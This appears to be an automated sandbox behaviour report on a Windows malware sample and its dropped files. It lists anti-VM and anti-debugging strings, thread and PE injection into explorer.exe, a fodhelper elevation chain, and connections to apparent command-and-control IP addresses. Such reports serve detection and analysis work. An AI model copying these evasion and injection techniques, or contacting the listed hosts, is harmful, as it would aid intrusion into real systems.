Source: 6F54.exe	Binary or memory string: vmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ... exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC
Source: 6F54.exe	Binary or memory string: sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--D
Source: 6F54.exe	Binary or memory string: eUnprocessable EntityWinmonProcessMonitor\\.\pipe\VBoxTrayIPC^.*\._Ctype_uint8_t$asn1: syntax error: assigned stream ID 0bad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpcertificate requiredchan send (nil chan)close of nil channe
Source: 2788.exe, 00000006.00000003.4122857711.00000000030FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntor-onion-key zeABkSC5U36c9jPkbqVUzrjd6qt+/Rti3yHGfsRtYhY
Source: 6F54.exe	Binary or memory string: rdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying=
Source: 6F54.exe	Binary or memory string: potency-Key\System32\drivers\\.\VBoxMiniRdrDN os/exec.Command(^.*\._Ctype_char$bad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcpu name is emptycreate window: %wdecode server: %wdecryption faileddownload fi
Source: 6F54.exe	Binary or memory string: releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
Source: 6F54.exe	Binary or memory string: lUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: 2788.exe, 00000006.00000003.3671523630.0000000003372000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MIGJAoGBALTKLm+Dn2//Wdsm4wVkqC6KdyxM64ihWRVmcinNdv7gngpzrQ45dqJm
Source: 6F54.exe	Binary or memory string: MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Window
Source: explorer.exe, 00000002.00000000.2025009942.0000000009B79000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: 6F54.exe	Binary or memory string: PalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:
Source: explorer.exe, 00000002.00000000.2022865976.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: 6F54.exe	Binary or memory string: bmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%
Source: 6F54.exe	Binary or memory string: ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--DYOR--
Source: 6F54.exe	Binary or memory string: ultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-languageadvertise erroragent is closedapplication/pdfasyncpreemptoffbad certificatebad trailer keybefore EfiGuardclass registredclient finishedcouldn't set AVcouldn't set sbdecode hash: %wdo
Source: 6F54.exe	Binary or memory string: bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (a
Source: explorer.exe, 00000002.00000000.2022865976.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: 6F54.exe	Binary or memory string: swsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAccepted
Source: 6F54.exe	Binary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservi
Source: explorer.exe, 00000002.00000000.2022279576.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: 6F54.exe	Binary or memory string: ddrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.)
Source: 6F54.exe	Binary or memory string: rayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\Def

Source: C:\Users\user\AppData\Local\Temp\4294.exe	API call chain: ExitProcess graph end node	graph_8-22860
Source: C:\Users\user\AppData\Local\Temp\4294.exe	API call chain: ExitProcess graph end node	graph_8-23388
Source: C:\Users\user\AppData\Local\Temp\4294.exe	API call chain: ExitProcess graph end node	graph_8-23314
Source: C:\Users\user\AppData\Local\Temp\4294.exe	API call chain: ExitProcess graph end node	graph_8-23234

Source: C:\Users\user\Desktop\HVqTxn73uD.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\HVqTxn73uD.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\HVqTxn73uD.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfriduf	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\fcriduf	System information queried: CodeIntegrityInformation

Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfriduf	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\fcriduf	Process queried: DebugPort

Source: C:\Users\user\Desktop\HVqTxn73uD.exe

Code function: 0_2_004029BA LdrLoadDll,

0_2_004029BA

Source: C:\Users\user\AppData\Local\Temp\4294.exe

Code function: 8_2_00407F4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

8_2_00407F4E

Source: C:\Users\user\AppData\Local\Temp\4294.exe

Code function: 8_2_00401450 VirtualAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,VirtualProtect,lstrlenW,CreateThread,Sleep,WaitForSingleObject,

8_2_00401450

Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_00900D90 mov eax, dword ptr fs:[00000030h]	0_2_00900D90
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_0090092B mov eax, dword ptr fs:[00000030h]	0_2_0090092B
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_00AC0060 push dword ptr fs:[00000030h]	0_2_00AC0060
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: 4_2_0089EA08 push dword ptr fs:[00000030h]	4_2_0089EA08
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: 4_2_009C0D90 mov eax, dword ptr fs:[00000030h]	4_2_009C0D90
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: 4_2_009C092B mov eax, dword ptr fs:[00000030h]	4_2_009C092B
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Code function: 5_2_0508F0A3 push dword ptr fs:[00000030h]	5_2_0508F0A3
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Code function: 5_2_05350042 push dword ptr fs:[00000030h]	5_2_05350042
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_00401450 mov edx, dword ptr fs:[00000030h]	8_2_00401450
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005E5255 mov eax, dword ptr fs:[00000030h]	8_2_005E5255
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005D5420 mov eax, dword ptr fs:[00000030h]	8_2_005D5420
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005DB57B mov eax, dword ptr fs:[00000030h]	8_2_005DB57B
Source: C:\ProgramData\Drivers\csrss.exe	Code function: 12_2_05600083 push dword ptr fs:[00000030h]	12_2_05600083
Source: C:\ProgramData\Drivers\csrss.exe	Code function: 12_2_05800042 push dword ptr fs:[00000030h]	12_2_05800042
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Code function: 14_2_009E0D90 mov eax, dword ptr fs:[00000030h]	14_2_009E0D90
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Code function: 14_2_009E092B mov eax, dword ptr fs:[00000030h]	14_2_009E092B
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Code function: 14_2_00A5EC4A push dword ptr fs:[00000030h]	14_2_00A5EC4A
Source: C:\ProgramData\Drivers\csrss.exe	Code function: 26_2_05600083 push dword ptr fs:[00000030h]	26_2_05600083
Source: C:\ProgramData\Drivers\csrss.exe	Code function: 26_2_05800042 push dword ptr fs:[00000030h]	26_2_05800042
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Code function: 33_2_02A6E0A3 push dword ptr fs:[00000030h]	33_2_02A6E0A3

Source: C:\Users\user\AppData\Local\Temp\4294.exe

Code function: 8_2_005E233E GetProcessHeap,

8_2_005E233E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_004080B3 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_004080B3
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_00407F4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00407F4E
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_004041C7 SetUnhandledExceptionFilter,	8_2_004041C7
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_004059BA _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_004059BA
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005D6230 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_005D6230
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005E33F9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_005E33F9
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005D5D35 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_005D5D35
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005D5D29 SetUnhandledExceptionFilter,	8_2_005D5D29

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: sfriduf.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 172.67.215.49 443	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query:
Source: C:\Windows\explorer.exe	Network Connect: 34.143.166.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: everystep-org.mail.protection.outlook.com
Source: C:\Windows\explorer.exe	Network Connect: 104.198.2.251 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.94.245.237 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.88.149 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 211.171.233.129 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.168.30 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.215.85.17 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 95.86.30.3 80	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\2788.exe

Code function: 5_2_05350110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,

5_2_05350110

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Thread created: C:\Windows\explorer.exe EIP: 3341AD0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfriduf	Thread created: unknown EIP: 31C1AD0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Thread created: unknown EIP: 31E1A40
Source: C:\Users\user\AppData\Roaming\fcriduf	Thread created: unknown EIP: 3371A40

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\2788.exe	Memory written: C:\Users\user\AppData\Local\Temp\2788.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\Drivers\csrss.exe	Memory written: C:\ProgramData\Drivers\csrss.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\Drivers\csrss.exe	Memory written: C:\ProgramData\Drivers\csrss.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfriduf	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfriduf	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\fcriduf	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\fcriduf	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read

Source: C:\Users\user\AppData\Local\Temp\2788.exe	Process created: C:\Users\user\AppData\Local\Temp\2788.exe C:\Users\user\AppData\Local\Temp\2788.exe	Jump to behavior
Source: C:\ProgramData\Drivers\csrss.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\fodhelper.exe	Process created: C:\Users\user\AppData\Local\Temp\6F54.exe "C:\Users\user\AppData\Local\Temp\6F54.exe"
Source: C:\ProgramData\Drivers\csrss.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile

Source: explorer.exe, 00000002.00000000.2025009942.0000000009B79000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2022587440.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.2022587440.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2023451272.0000000004B00000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2022587440.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.2022587440.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2022279576.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Source: C:\Users\user\AppData\Local\Temp\4294.exe

Code function: 8_2_005D5F48 cpuid

8_2_005D5F48

Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: GetLocaleInfoA,	0_2_0040C17C
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: GetLocaleInfoA,	4_2_0040C17C
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: GetLocaleInfoA,	8_2_00409A8C
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Code function: GetLocaleInfoA,	14_2_0040C17C

Source: C:\Users\user\AppData\Local\Temp\2788.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\tcl8 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\tcl8\8.4 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\tcl8\8.5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\tcl VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\tcl\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\tcl\http1.0 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\tcl\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\tcl\opt0.4 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\tcl\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\tcl\tzdata\Africa VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\tcl\tzdata\America VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\tcl\tzdata\America\Argentina VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\tcl\tzdata\America\Indiana VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\tcl\tzdata\America\Kentucky VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\tcl\tzdata\America\North_Dakota VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\tcl\tzdata\Antarctica VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\3EBB.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\3EBB.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\_ctypes.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\3EBB.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\3EBB.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\_tkinter.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56002\tcl\encoding VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
